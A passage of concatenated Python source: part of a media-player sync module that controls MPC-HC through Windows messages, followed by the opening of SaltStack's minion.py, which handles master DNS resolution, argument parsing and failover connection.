self.__listener.SendCommand(self.CMD_PLAYPAUSE)
@waitForFileStateReady
def unpause(self):
self.__listener.SendCommand(self.CMD_PLAY)
@waitForFileStateReady
def askForCurrentPosition(self):
self.__listener.SendCommand(self.CMD_GETCURRENTPOSITION)
@waitForFileStateReady
def seek(self, position):
self.__listener.SendCommand(self.CMD_SETPOSITION, str(position))
@waitForFileStateReady
def setSpeed(self, rate):
self.__listener.SendCommand(self.CMD_SETSPEED, str(rate))
def sendOsd(self, message, MsgPos=constants.MPC_OSD_POSITION, DurationMs=(constants.OSD_DURATION*1000)):
class __OSDDATASTRUCT(ctypes.Structure):
_fields_ = [
('nMsgPos', ctypes.c_int32),
('nDurationMS', ctypes.c_int32),
('strMsg', ctypes.c_wchar * (len(message) + 1))
]
cmessage = __OSDDATASTRUCT()
cmessage.nMsgPos = MsgPos
cmessage.nDurationMS = DurationMs
cmessage.strMsg = message
self.__listener.SendCommand(self.CMD_OSDSHOWMESSAGE, cmessage)
def sendRawCommand(self, cmd, value):
self.__listener.SendCommand(cmd, value)
def handleCommand(self, cmd, value):
if cmd == self.CMD_CONNECT:
self.__listener.mpcHandle = int(value)
self.__locks.mpcStart.set()
if self.callbacks.onConnected:
_thread.start_new_thread(self.callbacks.onConnected, ())
elif cmd == self.CMD_STATE:
self.loadState = int(value)
fileNotReady = (
self.loadState == self.__MPC_LOADSTATE.MLS_CLOSING or
self.loadState == self.__MPC_LOADSTATE.MLS_LOADING or
self.loadState == self.__MPC_LOADSTATE.MLS_CLOSED
)
if fileNotReady:
self.playState = None
self.__locks.fileReady.clear()
else:
self.__locks.fileReady.set()
if self.callbacks.onFileStateChange:
_thread.start_new_thread(self.callbacks.onFileStateChange, (self.loadState,))
elif cmd == self.CMD_PLAYMODE:
self.playState = int(value)
if self.callbacks.onUpdatePlaystate:
_thread.start_new_thread(self.callbacks.onUpdatePlaystate, (self.playState,))
elif cmd == self.CMD_NOWPLAYING:
value = re.split(r'(?<!\\)\|', value)
if self.filePath == value[3]:
return
self.filePath = value[3]
self.filePlaying = value[3].split('\\').pop()
self.fileDuration = float(value[4])
if self.callbacks.onUpdatePath:
_thread.start_new_thread(self.callbacks.onUpdatePath, (self.onUpdatePath,))
if self.callbacks.onUpdateFilename:
_thread.start_new_thread(self.callbacks.onUpdateFilename, (self.filePlaying,))
if self.callbacks.onUpdateFileDuration:
_thread.start_new_thread(self.callbacks.onUpdateFileDuration, (self.fileDuration,))
elif cmd == self.CMD_CURRENTPOSITION:
self.lastFilePosition = float(value)
if self.callbacks.onGetCurrentPosition:
_thread.start_new_thread(self.callbacks.onGetCurrentPosition, (self.lastFilePosition,))
elif cmd == self.CMD_NOTIFYSEEK:
if self.lastFilePosition != float(value): # Notify seek is sometimes sent twice
self.lastFilePosition = float(value)
if self.callbacks.onSeek:
_thread.start_new_thread(self.callbacks.onSeek, (self.lastFilePosition,))
elif cmd == self.CMD_DISCONNECT:
if self.callbacks.onMpcClosed:
_thread.start_new_thread(self.callbacks.onMpcClosed, (None,))
elif cmd == self.CMD_VERSION:
if self.callbacks.onVersion:
self.version = value
_thread.start_new_thread(self.callbacks.onVersion, (value,))
class PlayerNotReadyException(Exception):
pass
class __Callbacks:
def __init__(self):
self.onConnected = None
self.onSeek = None
self.onUpdatePath = None
self.onUpdateFilename = None
self.onUpdateFileDuration = None
self.onGetCurrentPosition = None
self.onUpdatePlaystate = None
self.onFileStateChange = None
self.onMpcClosed = None
self.onVersion = None
class __Locks:
def __init__(self):
self.listenerStart = threading.Event()
self.mpcStart = threading.Event()
self.fileReady = threading.Event()
def __mpcReadyInSlaveMode(self):
while True:
time.sleep(10)
if not win32gui.IsWindow(self.__listener.mpcHandle):
if self.callbacks.onMpcClosed:
self.callbacks.onMpcClosed(None)
break
CMD_CONNECT = 0x50000000
CMD_STATE = 0x50000001
CMD_PLAYMODE = 0x50000002
CMD_NOWPLAYING = 0x50000003
CMD_LISTSUBTITLETRACKS = 0x50000004
CMD_LISTAUDIOTRACKS = 0x50000005
CMD_CURRENTPOSITION = 0x50000007
CMD_NOTIFYSEEK = 0x50000008
CMD_NOTIFYENDOFSTREAM = 0x50000009
CMD_PLAYLIST = 0x50000006
CMD_OPENFILE = 0xA0000000
CMD_STOP = 0xA0000001
CMD_CLOSEFILE = 0xA0000002
CMD_PLAYPAUSE = 0xA0000003
CMD_ADDTOPLAYLIST = 0xA0001000
CMD_CLEARPLAYLIST = 0xA0001001
CMD_STARTPLAYLIST = 0xA0001002
CMD_REMOVEFROMPLAYLIST = 0xA0001003 # TODO
CMD_SETPOSITION = 0xA0002000
CMD_SETAUDIODELAY = 0xA0002001
CMD_SETSUBTITLEDELAY = 0xA0002002
CMD_SETINDEXPLAYLIST = 0xA0002003 # DOESNT WORK
CMD_SETAUDIOTRACK = 0xA0002004
CMD_SETSUBTITLETRACK = 0xA0002005
CMD_GETSUBTITLETRACKS = 0xA0003000
CMD_GETCURRENTPOSITION = 0xA0003004
CMD_JUMPOFNSECONDS = 0xA0003005
CMD_GETAUDIOTRACKS = 0xA0003001
CMD_GETNOWPLAYING = 0xA0003002
CMD_GETPLAYLIST = 0xA0003003
CMD_TOGGLEFULLSCREEN = 0xA0004000
CMD_JUMPFORWARDMED = 0xA0004001
CMD_JUMPBACKWARDMED = 0xA0004002
CMD_INCREASEVOLUME = 0xA0004003
CMD_DECREASEVOLUME = 0xA0004004
CMD_SHADER_TOGGLE = 0xA0004005
CMD_CLOSEAPP = 0xA0004006
CMD_OSDSHOWMESSAGE = 0xA0005000
CMD_VERSION = 0x5000000A
CMD_DISCONNECT = 0x5000000B
CMD_PLAY = 0xA0000004
CMD_PAUSE = 0xA0000005
CMD_GETVERSION = 0xA0003006
CMD_SETSPEED = 0xA0004008
class __MPC_LOADSTATE:
MLS_CLOSED = 0
MLS_LOADING = 1
MLS_LOADED = 2
MLS_CLOSING = 3
class __MPC_PLAYSTATE:
PS_PLAY = 0
PS_PAUSE = 1
PS_STOP = 2
PS_UNUSED = 3
class __Listener(threading.Thread):
def __init__(self, mpcApi, locks):
self.__mpcApi = mpcApi
self.locks = locks
self.mpcHandle = None
self.hwnd = None
self.__PCOPYDATASTRUCT = ctypes.POINTER(self.__COPYDATASTRUCT)
threading.Thread.__init__(self, name="MPC Listener")
def run(self):
message_map = {
win32con.WM_COPYDATA: self.OnCopyData
}
wc = win32gui.WNDCLASS()
wc.lpfnWndProc = message_map
wc.lpszClassName = 'MPCApiListener'
hinst = wc.hInstance = win32api.GetModuleHandle(None)
classAtom = win32gui.RegisterClass(wc)
self.hwnd = win32gui.CreateWindow(
classAtom,
"ListenerGUI",
0,
0,
0,
win32con.CW_USEDEFAULT,
win32con.CW_USEDEFAULT,
0,
0,
hinst,
None
)
self.locks.listenerStart.set()
win32gui.PumpMessages()
def OnCopyData(self, hwnd, msg, wparam, lparam):
pCDS = ctypes.cast(lparam, self.__PCOPYDATASTRUCT)
# print "API:\tin>\t 0x%X\t" % int(pCDS.contents.dwData), ctypes.wstring_at(pCDS.contents.lpData)
self.__mpcApi.handleCommand(pCDS.contents.dwData, ctypes.wstring_at(pCDS.contents.lpData))
def SendCommand(self, cmd, message=''):
# print "API:\t<out\t 0x%X\t" % int(cmd), message
if not win32gui.IsWindow(self.mpcHandle):
if self.__mpcApi.callbacks.onMpcClosed:
self.__mpcApi.callbacks.onMpcClosed(None)
cs = self.__COPYDATASTRUCT()
cs.dwData = cmd;
if isinstance(message, str):
message = ctypes.create_unicode_buffer(message, len(message) + 1)
elif isinstance(message, ctypes.Structure):
pass
else:
raise TypeError
cs.lpData = ctypes.addressof(message)
cs.cbData = ctypes.sizeof(message)
ptr = ctypes.addressof(cs)
win32api.SendMessage(self.mpcHandle, win32con.WM_COPYDATA, self.hwnd, ptr)
class __COPYDATASTRUCT(ctypes.Structure):
_fields_ = [
('dwData', ctypes.wintypes.LPARAM),
('cbData', ctypes.wintypes.DWORD),
('lpData', ctypes.c_void_p)
]
class MPCHCAPIPlayer(BasePlayer):
speedSupported = False
alertOSDSupported = False
customOpenDialog = False
chatOSDSupported = False
osdMessageSeparator = "; "
def __init__(self, client):
from twisted.internet import reactor
self.reactor = reactor
self.__client = client
self._mpcApi = MpcHcApi()
self._mpcApi.callbacks.onUpdateFilename = lambda _: self.__makePing()
self._mpcApi.callbacks.onMpcClosed = lambda _: self.reactor.callFromThread(self.__client.stop, False,)
self._mpcApi.callbacks.onFileStateChange = lambda _: self.__lockAsking()
self._mpcApi.callbacks.onUpdatePlaystate = lambda _: self.__unlockAsking()
self._mpcApi.callbacks.onGetCurrentPosition = lambda _: self.__onGetPosition()
self._mpcApi.callbacks.onVersion = lambda _: self.__versionUpdate.set()
self.__switchPauseCalls = False
self.__preventAsking = threading.Event()
self.__positionUpdate = threading.Event()
self.__versionUpdate = threading.Event()
self.__fileUpdate = threading.RLock()
self.__versionUpdate.clear()
@staticmethod
def getMinVersionErrorMessage():
return getMessage("mpc-version-insufficient-error").format(constants.MPC_MIN_VER)
def drop(self):
self.__preventAsking.set()
self.__positionUpdate.set()
self.__versionUpdate.set()
self._mpcApi.sendRawCommand(MpcHcApi.CMD_CLOSEAPP, "")
@staticmethod
def getPlayerPathErrors(playerPath, filePath):
return None
@staticmethod
def run(client, playerPath, filePath, args):
args.extend(['/open', '/new'])
mpc = MPCHCAPIPlayer(client)
mpc._mpcApi.callbacks.onConnected = lambda: mpc.initPlayer(filePath if filePath else None)
mpc._mpcApi.startMpc(MPCHCAPIPlayer.getExpandedPath(playerPath), args)
client.initPlayer(mpc)
return mpc
def __lockAsking(self):
self.__preventAsking.clear()
def __unlockAsking(self):
self.__preventAsking.set()
def __onGetPosition(self):
self.__positionUpdate.set()
def setSpeed(self, value):
try:
self._mpcApi.setSpeed(value)
except MpcHcApi.PlayerNotReadyException:
self.setSpeed(value)
def __dropIfNotSufficientVersion(self):
self._mpcApi.askForVersion()
if not self.__versionUpdate.wait(0.1) or not self._mpcApi.version:
self.reactor.callFromThread(self.__client.ui.showErrorMessage, self.getMinVersionErrorMessage(), True)
self.reactor.callFromThread(self.__client.stop, True)
def __testMpcReady(self):
if not self.__preventAsking.wait(10):
raise Exception(getMessage("player-file-open-error"))
def __makePing(self):
try:
self.__testMpcReady()
self._mpcApi.callbacks.onUpdateFilename = lambda _: self.__handleUpdatedFilename()
self.__handleUpdatedFilename()
self.askForStatus()
except Exception as err:
self.reactor.callFromThread(self.__client.ui.showErrorMessage, err.message, True)
self.reactor.callFromThread(self.__client.stop)
def initPlayer(self, filePath):
self.__dropIfNotSufficientVersion()
if not self._mpcApi.version:
return
self.__mpcVersion = self._mpcApi.version.split('.')
if self.__mpcVersion[0:3] == ['1', '6', '4']:
self.__switchPauseCalls = True
if filePath:
self.openFile(filePath)
def openFile(self, filePath, resetPosition=False):
self._mpcApi.openFile(filePath)
if resetPosition:
self.setPosition(0)
def displayMessage(
self, message,
duration=(constants.OSD_DURATION*1000), OSDType=constants.OSD_NOTIFICATION, mood=constants.MESSAGE_NEUTRAL
):
self._mpcApi.sendOsd(message, constants.MPC_OSD_POSITION, duration)
@retry(MpcHcApi.PlayerNotReadyException, constants.MPC_MAX_RETRIES, constants.MPC_RETRY_WAIT_TIME, 1)
def setPaused(self, value):
if self._mpcApi.filePlaying:
if self.__switchPauseCalls:
value = not value
if value:
self._mpcApi.pause()
else:
self._mpcApi.unpause()
def setFeatures(self, featureList):
pass
@retry(MpcHcApi.PlayerNotReadyException, constants.MPC_MAX_RETRIES, constants.MPC_RETRY_WAIT_TIME, 1)
def setPosition(self, value):
if self._mpcApi.filePlaying:
self._mpcApi.seek(value)
def __getPosition(self):
self.__positionUpdate.clear()
self._mpcApi.askForCurrentPosition()
self.__positionUpdate.wait(constants.MPC_LOCK_WAIT_TIME)
return self._mpcApi.lastFilePosition
def askForStatus(self):
try:
if self._mpcApi.filePlaying and self.__preventAsking.wait(0) and self.__fileUpdate.acquire(0):
self.__fileUpdate.release()
position = self.__getPosition()
paused = self._mpcApi.isPaused()
position = float(position)
if self.__preventAsking.wait(0) and self.__fileUpdate.acquire(0):
self.__client.updatePlayerStatus(paused, position)
self.__fileUpdate.release()
else:
self.__echoGlobalStatus()
except MpcHcApi.PlayerNotReadyException:
self.__echoGlobalStatus()
def __echoGlobalStatus(self):
self.__client.updatePlayerStatus(self.__client.getGlobalPaused(), self.__client.getGlobalPosition())
def __forcePause(self):
for _ in range(constants.MPC_MAX_RETRIES):
self.setPaused(True)
time.sleep(constants.MPC_RETRY_WAIT_TIME)
def __refreshMpcPlayState(self):
for _ in range(2):
self._mpcApi.playPause()
time.sleep(constants.MPC_PAUSE_TOGGLE_DELAY)
def _setPausedAccordinglyToServer(self):
self.__forcePause()
self.setPaused(self.__client.getGlobalPaused())
if self._mpcApi.isPaused() != self.__client.getGlobalPaused():
self.__refreshMpcPlayState()
if self._mpcApi.isPaused() != self.__client.getGlobalPaused():
self.__setUpStateForNewlyOpenedFile()
@retry(MpcHcApi.PlayerNotReadyException, constants.MPC_MAX_RETRIES, constants.MPC_RETRY_WAIT_TIME, 1)
def __setUpStateForNewlyOpenedFile(self):
self._setPausedAccordinglyToServer()
self._mpcApi.seek(self.__client.getGlobalPosition())
def __handleUpdatedFilename(self):
with self.__fileUpdate:
self.__setUpStateForNewlyOpenedFile()
args = (self._mpcApi.filePlaying, self._mpcApi.fileDuration, self._mpcApi.filePath)
self.reactor.callFromThread(self.__client.updateFile, *args)
def sendCustomCommand(self, cmd, val):
self._mpcApi.sendRawCommand(cmd, val)
@staticmethod
def getDefaultPlayerPathsList():
return constants.MPC_PATHS
@staticmethod
def getIconPath(path):
if (
MPCHCAPIPlayer.getExpandedPath(path).lower().endswith('mpc-hc64.exe'.lower()) or
MPCHCAPIPlayer.getExpandedPath(path).lower().endswith('mpc-hc64_nvo.exe'.lower())
):
return constants.MPC64_ICONPATH
else:
return constants.MPC_ICONPATH
@staticmethod
def isValidPlayerPath(path):
if MPCHCAPIPlayer.getExpandedPath(path):
return True
return False
@staticmethod
def getExpandedPath(path):
if os.path.isfile(path):
if (
path.lower().endswith('mpc-hc.exe'.lower()) or path.lower().endswith('mpc-hcportable.exe'.lower()) or
path.lower().endswith('mpc-hc64.exe'.lower()) or path.lower().endswith('mpc-hc64_nvo.exe'.lower()) or
path.lower().endswith('mpc-hc_nvo.exe'.lower())
):
return path
if os.path.isfile(path + "mpc-hc.exe"):
path += "mpc-hc.exe"
return path
if os.path.isfile(path + "\\mpc-hc.exe"):
path += "\\mpc-hc.exe"
return path
if os.path.isfile(path + "mpc-hcportable.exe"):
path += "mpc-hcportable.exe"
return path
if os.path.isfile(path + "\\mpc-hcportable.exe"):
path += "\\mpc-hcportable.exe"
return path
if os.path.isfile(path + "mpc-hc_nvo.exe"):
path += "mpc-hc_nvo.exe"
return path
if os.path.isfile(path + "\\mpc-hc_nvo.exe"):
path += "\\mpc-hc_nvo.exe"
return path
if os.path.isfile(path + "mpc-hc64.exe"):
path += "mpc-hc64.exe"
return path
if os.path.isfile(path + "\\mpc-hc64.exe"):
path += "\\mpc-hc64.exe"
return path
if os.path.isfile(path + "mpc-hc64_nvo.exe"):
path += "mpc-hc64_nvo.exe"
return path
if os.path.isfile(path + "\\mpc-hc64_nvo.exe"):
path += "\\mpc-hc64_nvo.exe"
return path
|
minion.py
|
# -*- coding: utf-8 -*-
'''
Routines to set up a minion
'''
# Import python libs
from __future__ import absolute_import, print_function, with_statement
import os
import re
import sys
import copy
import time
import types
import signal
import fnmatch
import logging
import threading
import traceback
import contextlib
import multiprocessing
from random import randint, shuffle
from stat import S_IMODE
# Import Salt Libs
# pylint: disable=import-error,no-name-in-module,redefined-builtin
import salt.ext.six as six
if six.PY3:
import ipaddress
else:
import salt.ext.ipaddress as ipaddress
from salt.ext.six.moves import range
# pylint: enable=no-name-in-module,redefined-builtin
# Import third party libs
try:
import zmq
# TODO: cleanup
import zmq.eventloop.ioloop
# support pyzmq 13.0.x, TODO: remove once we force people to 14.0.x
if not hasattr(zmq.eventloop.ioloop, 'ZMQIOLoop'):
zmq.eventloop.ioloop.ZMQIOLoop = zmq.eventloop.ioloop.IOLoop
LOOP_CLASS = zmq.eventloop.ioloop.ZMQIOLoop
HAS_ZMQ = True
except ImportError:
import tornado.ioloop
LOOP_CLASS = tornado.ioloop.IOLoop
HAS_ZMQ = False
HAS_RANGE = False
try:
import seco.range
HAS_RANGE = True
except ImportError:
pass
HAS_PSUTIL = False
try:
import salt.utils.psutil_compat as psutil
HAS_PSUTIL = True
except ImportError:
pass
HAS_RESOURCE = False
try:
import resource
HAS_RESOURCE = True
except ImportError:
pass
try:
import zmq.utils.monitor
HAS_ZMQ_MONITOR = True
except ImportError:
HAS_ZMQ_MONITOR = False
# pylint: enable=import-error
# Import salt libs
import salt
import salt.client
import salt.crypt
import salt.loader
import salt.beacons
import salt.engines
import salt.payload
import salt.syspaths
import salt.utils
import salt.utils.context
import salt.utils.jid
import salt.pillar
import salt.utils.args
import salt.utils.event
import salt.utils.minion
import salt.utils.minions
import salt.utils.schedule
import salt.utils.error
import salt.utils.zeromq
import salt.defaults.exitcodes
import salt.cli.daemons
import salt.log.setup
from salt.config import DEFAULT_MINION_OPTS
from salt.defaults import DEFAULT_TARGET_DELIM
from salt.executors import FUNCTION_EXECUTORS
from salt.utils.debug import enable_sigusr1_handler
from salt.utils.event import tagify
from salt.utils.odict import OrderedDict
from salt.utils.process import (default_signals,
SignalHandlingMultiprocessingProcess,
ProcessManager)
from salt.exceptions import (
CommandExecutionError,
CommandNotFoundError,
SaltInvocationError,
SaltReqTimeoutError,
SaltClientError,
SaltSystemExit,
SaltDaemonNotRunning,
SaltException,
)
import tornado.gen # pylint: disable=F0401
import tornado.ioloop # pylint: disable=F0401
log = logging.getLogger(__name__)
# To set up a minion:
# 1. Read in the configuration
# 2. Generate the function mapping dict
# 3. Authenticate with the master
# 4. Store the AES key
# 5. Connect to the publisher
# 6. Handle publications
def resolve_dns(opts, fallback=True):
'''
Resolves the master_ip and master_uri options
'''
ret = {}
check_dns = True
if (opts.get('file_client', 'remote') == 'local' and
not opts.get('use_master_when_local', False)):
check_dns = False
if check_dns is True:
# Because I import salt.log below I need to re-import salt.utils here
import salt.utils
try:
if opts['master'] == '':
raise SaltSystemExit
ret['master_ip'] = \
salt.utils.dns_check(opts['master'], True, opts['ipv6'])
except SaltClientError:
if opts['retry_dns']:
while True:
import salt.log
msg = ('Master hostname: \'{0}\' not found. Retrying in {1} '
'seconds').format(opts['master'], opts['retry_dns'])
if salt.log.setup.is_console_configured():
log.error(msg)
else:
print('WARNING: {0}'.format(msg))
time.sleep(opts['retry_dns'])
try:
ret['master_ip'] = salt.utils.dns_check(
opts['master'], True, opts['ipv6']
)
break
except SaltClientError:
pass
else:
if fallback:
ret['master_ip'] = '127.0.0.1'
else:
raise
except SaltSystemExit:
unknown_str = 'unknown address'
master = opts.get('master', unknown_str)
if master == '':
master = unknown_str
if opts.get('__role') == 'syndic':
err = 'Master address: \'{0}\' could not be resolved. Invalid or unresolveable address. Set \'syndic_master\' value in minion config.'.format(master)
else:
err = 'Master address: \'{0}\' could not be resolved. Invalid or unresolveable address. Set \'master\' value in minion config.'.format(master)
log.error(err)
raise SaltSystemExit(code=42, msg=err)
else:
ret['master_ip'] = '127.0.0.1'
if 'master_ip' in ret and 'master_ip' in opts:
if ret['master_ip'] != opts['master_ip']:
log.warning('Master ip address changed from {0} to {1}'.format(opts['master_ip'],
ret['master_ip'])
)
ret['master_uri'] = 'tcp://{ip}:{port}'.format(ip=ret['master_ip'],
port=opts['master_port'])
return ret
def prep_ip_port(opts):
ret = {}
if opts['master_uri_format'] == 'ip_only':
ret['master'] = opts['master']
else:
ip_port = opts['master'].rsplit(":", 1)
if len(ip_port) == 1:
# e.g. master: mysaltmaster
ret['master'] = ip_port[0]
else:
# e.g. master: localhost:1234
# e.g. master: 127.0.0.1:1234
# e.g. master: ::1:1234
ret['master'] = ip_port[0]
ret['master_port'] = ip_port[1]
return ret
def get_proc_dir(cachedir, **kwargs):
'''
Given the cache directory, return the directory that process data is
stored in, creating it if it doesn't exist.
The following optional Keyword Arguments are handled:
mode: which is anything os.makedir would accept as mode.
uid: the uid to set, if not set, or it is None or -1 no changes are
made. Same applies if the directory is already owned by this
uid. Must be int. Works only on unix/unix like systems.
gid: the gid to set, if not set, or it is None or -1 no changes are
made. Same applies if the directory is already owned by this
gid. Must be int. Works only on unix/unix like systems.
'''
fn_ = os.path.join(cachedir, 'proc')
mode = kwargs.pop('mode', None)
if mode is None:
mode = {}
else:
mode = {'mode': mode}
if not os.path.isdir(fn_):
# proc_dir is not present, create it with mode settings
os.makedirs(fn_, **mode)
d_stat = os.stat(fn_)
# if mode is not an empty dict then we have an explicit
# dir mode. So lets check if mode needs to be changed.
if mode:
mode_part = S_IMODE(d_stat.st_mode)
if mode_part != mode['mode']:
os.chmod(fn_, (d_stat.st_mode ^ mode_part) | mode['mode'])
if hasattr(os, 'chown'):
# only on unix/unix like systems
uid = kwargs.pop('uid', -1)
gid = kwargs.pop('gid', -1)
# if uid and gid are both -1 then go ahead with
# no changes at all
if (d_stat.st_uid != uid or d_stat.st_gid != gid) and \
[i for i in (uid, gid) if i != -1]:
os.chown(fn_, uid, gid)
return fn_
def load_args_and_kwargs(func, args, data=None, ignore_invalid=False):
'''
Detect the args and kwargs that need to be passed to a function call, and
check them against what was passed.
'''
argspec = salt.utils.args.get_function_argspec(func)
_args = []
_kwargs = {}
invalid_kwargs = []
for arg in args:
if isinstance(arg, six.string_types):
string_arg, string_kwarg = salt.utils.args.parse_input([arg], condition=False) # pylint: disable=W0632
if string_arg:
# Don't append the version that was just derived from parse_cli
# above, that would result in a 2nd call to
# salt.utils.cli.yamlify_arg(), which could mangle the input.
_args.append(arg)
elif string_kwarg:
salt.utils.warn_until(
'Nitrogen',
'The list of function args and kwargs should be parsed '
'by salt.utils.args.parse_input() before calling '
'salt.minion.load_args_and_kwargs().'
)
if argspec.keywords or next(six.iterkeys(string_kwarg)) in argspec.args:
# Function supports **kwargs or is a positional argument to
# the function.
_kwargs.update(string_kwarg)
else:
# **kwargs not in argspec and parsed argument name not in
# list of positional arguments. This keyword argument is
# invalid.
for key, val in six.iteritems(string_kwarg):
invalid_kwargs.append('{0}={1}'.format(key, val))
continue
# if the arg is a dict with __kwarg__ == True, then its a kwarg
elif isinstance(arg, dict) and arg.pop('__kwarg__', False) is True:
for key, val in six.iteritems(arg):
if argspec.keywords or key in argspec.args:
# Function supports **kwargs or is a positional argument to
# the function.
_kwargs[key] = val
else:
# **kwargs not in argspec and parsed argument name not in
# list of positional arguments. This keyword argument is
# invalid.
invalid_kwargs.append('{0}={1}'.format(key, val))
continue
else:
_args.append(arg)
if invalid_kwargs and not ignore_invalid:
salt.utils.invalid_kwargs(invalid_kwargs)
if argspec.keywords and isinstance(data, dict):
# this function accepts **kwargs, pack in the publish data
for key, val in six.iteritems(data):
_kwargs['__pub_{0}'.format(key)] = val
return _args, _kwargs
def eval_master_func(opts):
'''
Evaluate master function if master type is 'func'
and save it result in opts['master']
'''
if '__master_func_evaluated' not in opts:
# split module and function and try loading the module
mod_fun = opts['master']
mod, fun = mod_fun.split('.')
try:
master_mod = salt.loader.raw_mod(opts, mod, fun)
if not master_mod:
raise KeyError
# we take whatever the module returns as master address
opts['master'] = master_mod[mod_fun]()
if not isinstance(opts['master'], str):
raise TypeError
opts['__master_func_evaluated'] = True
except KeyError:
log.error('Failed to load module {0}'.format(mod_fun))
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
except TypeError:
log.error('{0} returned from {1} is not a string'.format(opts['master'], mod_fun))
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
log.info('Evaluated master from module: {0}'.format(mod_fun))
class MinionBase(object):
def __init__(self, opts):
self.opts = opts
@staticmethod
def process_schedule(minion, loop_interval):
try:
if hasattr(minion, 'schedule'):
minion.schedule.eval()
else:
log.error('Minion scheduler not initialized. Scheduled jobs will not be run.')
return
# Check if scheduler requires lower loop interval than
# the loop_interval setting
if minion.schedule.loop_interval < loop_interval:
loop_interval = minion.schedule.loop_interval
log.debug(
'Overriding loop_interval because of scheduled jobs.'
)
except Exception as exc:
log.error(
'Exception {0} occurred in scheduled job'.format(exc)
)
return loop_interval
def process_beacons(self, functions):
'''
Evaluate all of the configured beacons, grab the config again in case
the pillar or grains changed
'''
if 'config.merge' in functions:
b_conf = functions['config.merge']('beacons', self.opts['beacons'], omit_opts=True)
if b_conf:
return self.beacons.process(b_conf, self.opts['grains']) # pylint: disable=no-member
return []
@tornado.gen.coroutine
def eval_master(self,
opts,
timeout=60,
safe=True,
failed=False,
failback=False):
'''
Evaluates and returns a tuple of the current master address and the pub_channel.
In standard mode, just creates a pub_channel with the given master address.
With master_type=func evaluates the current master address from the given
module and then creates a pub_channel.
With master_type=failover takes the list of masters and loops through them.
The first one that allows the minion to create a pub_channel is then
returned. If this function is called outside the minions initialization
phase (for example from the minions main event-loop when a master connection
loss was detected), 'failed' should be set to True. The current
(possibly failed) master will then be removed from the list of masters.
'''
# return early if we are not connecting to a master
if opts['master_type'] == 'disable':
log.warning('Master is set to disable, skipping connection')
self.connected = False
raise tornado.gen.Return((None, None))
# check if master_type was altered from its default
elif opts['master_type'] != 'str' and opts['__role'] != 'syndic':
# check for a valid keyword
if opts['master_type'] == 'func':
eval_master_func(opts)
# if failover is set, master has to be of type list
elif opts['master_type'] == 'failover':
if isinstance(opts['master'], list):
log.info('Got list of available master addresses:'
' {0}'.format(opts['master']))
if opts['master_shuffle']:
if opts['master_failback']:
secondary_masters = opts['master'][1:]
shuffle(secondary_masters)
opts['master'][1:] = secondary_masters
else:
shuffle(opts['master'])
opts['auth_tries'] = 0
if opts['master_failback'] and opts['master_failback_interval'] == 0:
opts['master_failback_interval'] = opts['master_alive_interval']
# if opts['master'] is a str and we have never created opts['master_list']
elif isinstance(opts['master'], str) and ('master_list' not in opts):
# We have a string, but a list was what was intended. Convert.
# See issue 23611 for details
opts['master'] = [opts['master']]
elif opts['__role'] == 'syndic':
log.info('Syndic setting master_syndic to \'{0}\''.format(opts['master']))
# if failed=True, the minion was previously connected
# we're probably called from the minions main-event-loop
# because a master connection loss was detected. remove
# the possibly failed master from the list of masters.
elif failed:
if failback:
# failback list of masters to original config
opts['master'] = opts['master_list']
else:
log.info('Moving possibly failed master {0} to the end of'
' the list of masters'.format(opts['master']))
if opts['master'] in opts['local_masters']:
# create new list of master with the possibly failed
# one moved to the end
failed_master = opts['master']
opts['master'] = [x for x in opts['local_masters'] if opts['master'] != x]
opts['master'].append(failed_master)
else:
opts['master'] = opts['master_list']
else:
msg = ('master_type set to \'failover\' but \'master\' '
'is not of type list but of type '
'{0}'.format(type(opts['master'])))
log.error(msg)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
# If failover is set, minion have to failover on DNS errors instead of retry DNS resolve.
# See issue 21082 for details
if opts['retry_dns']:
msg = ('\'master_type\' set to \'failover\' but \'retry_dns\' is not 0. '
'Setting \'retry_dns\' to 0 to failover to the next master on DNS errors.')
log.critical(msg)
opts['retry_dns'] = 0
else:
msg = ('Invalid keyword \'{0}\' for variable '
'\'master_type\''.format(opts['master_type']))
log.error(msg)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
# FIXME: if SMinion don't define io_loop, it can't switch master see #29088
# Specify kwargs for the channel factory so that SMinion doesn't need to define an io_loop
# (The channel factories will set a default if the kwarg isn't passed)
factory_kwargs = {'timeout': timeout, 'safe': safe}
if getattr(self, 'io_loop', None):
factory_kwargs['io_loop'] = self.io_loop # pylint: disable=no-member
tries = opts.get('master_tries', 1)
attempts = 0
# if we have a list of masters, loop through them and be
# happy with the first one that allows us to connect
if isinstance(opts['master'], list):
conn = False
# shuffle the masters and then loop through them
opts['local_masters'] = copy.copy(opts['master'])
if opts['random_master']:
shuffle(opts['local_masters'])
last_exc = None
while True:
attempts += 1
if tries > 0:
log.debug('Connecting to master. Attempt {0} '
'of {1}'.format(attempts, tries)
)
else:
log.debug('Connecting to master. Attempt {0} '
'(infinite attempts)'.format(attempts)
)
for master in opts['local_masters']:
opts['master'] = master
opts.update(prep_ip_port(opts))
opts.update(resolve_dns(opts))
# on first run, update self.opts with the whole master list
# to enable a minion to re-use old masters if they get fixed
if 'master_list' not in opts:
opts['master_list'] = copy.copy(opts['local_masters'])
self.opts = opts
try:
pub_channel = salt.transport.client.AsyncPubChannel.factory(opts, **factory_kwargs)
yield pub_channel.connect()
conn = True
break
except SaltClientError as exc:
last_exc = exc
msg = ('Master {0} could not be reached, trying '
'next master (if any)'.format(opts['master']))
log.info(msg)
continue
if not conn:
if attempts == tries:
# Exhausted all attempts. Return exception.
self.connected = False
msg = ('No master could be reached or all masters '
'denied the minions connection attempt.')
log.error(msg)
# If the code reaches this point, 'last_exc'
# should already be set.
raise last_exc # pylint: disable=E0702
else:
self.tok = pub_channel.auth.gen_token('salt')
self.connected = True
raise tornado.gen.Return((opts['master'], pub_channel))
# single master sign in
else:
if opts['random_master']:
log.warning('random_master is True but there is only one master specified. Ignoring.')
while True:
attempts += 1
if tries > 0:
log.debug('Connecting to master. Attempt {0} '
'of {1}'.format(attempts, tries)
)
else:
log.debug('Connecting to master. Attempt {0} '
'(infinite attempts)'.format(attempts)
)
opts.update(prep_ip_port(opts))
opts.update(resolve_dns(opts))
try:
if self.opts['transport'] == 'detect':
self.opts['detect_mode'] = True
for trans in ('zeromq', 'tcp'):
if trans == 'zeromq' and not HAS_ZMQ:
continue
self.opts['transport'] = trans
pub_channel = salt.transport.client.AsyncPubChannel.factory(self.opts, **factory_kwargs)
yield pub_channel.connect()
if not pub_channel.auth.authenticated:
continue
del self.opts['detect_mode']
